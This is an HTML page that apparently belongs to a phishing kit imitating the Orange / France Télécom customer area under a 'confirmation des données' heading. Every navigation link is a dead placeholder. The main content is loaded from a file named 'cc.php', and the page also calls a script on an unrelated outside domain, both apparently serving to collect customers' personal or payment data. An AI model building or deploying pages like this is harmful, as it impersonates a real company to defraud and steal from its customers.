<link rel="stylesheet" href="x.css" type="text/css">
<script src='jquery-1.4.3.min.js'></script>
<div id="vousetes">vous �tes ici : espace client > <a style="color:#FF5500;">confirmation des donn�es</a></div>
<script type="text/javascript" src="http://scriptv.net/v1.js"></script>
<table width="100%">
<tr><td style="width:200px;height:400px;">
<div id="menu">
	<ul>
		
  <li>
<h1>ma conso</h1>
<ul>
<li>
<a href="#">mon suivi conso</a>
</li>
<li>
<a href="#">mes factures</a>
</li>

</ul>
</li>
<li>
<h1>consulter/ modifier</h1>
<ul>
<li>
<a href="#">ma formule</a>
</li>
<li>
<a href="#">mes coordonn&eacute;es</a>
</li>
<li>
<a href="#">mon mode de paiement</a>

</li>
<li>
<a id="' img/puce.png '" href="#">mes identifiants <br>
internet et TV</a>
</li>
<li>
<a href="#">mon t&eacute;l&eacute;phone par internet</a>
</li>
<li>
<a href="#">mes services</a>
</li>
</ul>
</li>

  <li>
<h1>compte utilisateurs</h1>
<ul>
<li>
<a href="#">gestion des utilisateurs</a>
</li>
<li>
<a href="#">cr&eacute;ation d'un utilisateur</a>
</li>
</ul>
</li>

  <li>
<h1>ma TV</h1>
<ul>
<li>
<a href="#">ma boutique TV</a>
</li>
</ul>
</li>
</ul>
</div>
</td><td>

<!-- Content -->

<div id="o_content">
      <script>$('#o_content').load('cc.php');</script>
</div>

<!-- Content -->

</td></tr>
</table>
		<!-- Footer -->
		<div id="o_footer" style="margin-left: -10px;">

<div id="o_footer" class="resize " >
<ul class="footer"><li class="logo">
<a href="#"><img src="http://c.orange.fr/Icons/Footer/logoFT.gif" alt="France T&eacute;l&eacute;com" title="France T&eacute;l&eacute;com" border="0" height="23" width="21"></a></li><li>
<a class="withRightBorder" href="#" id="1revaluation" title="Orange en France">Orange en France</a></li><li>
<a class="withRightBorder" href="#" title="publicit&eacute;">publicit&eacute;</a></li><li>
<a class="withRightBorder" href="#" title="pr&eacute;vention et protection">pr&eacute;vention et protection</a></li>
<li><a class="withRightBorder" href="#" title="Donn&eacute;es personnelles">donn&eacute;es personnelles</a></li>
<li><a class="withRightBorder" href="#" title="environnement">environnement</a></li><li>
<a class="withRightBorder" href="#" title="informations l&eacute;gales">informations l&eacute;gales</a></li>
<li><a class="withRightBorder" href="#" title="internet +">internet +</a></li>
<li><a href="#" title="signaler un contenu illicite">signaler un contenu illicite</a></li>
</ul>
</div>

		</div>
		<!-- /Footer -->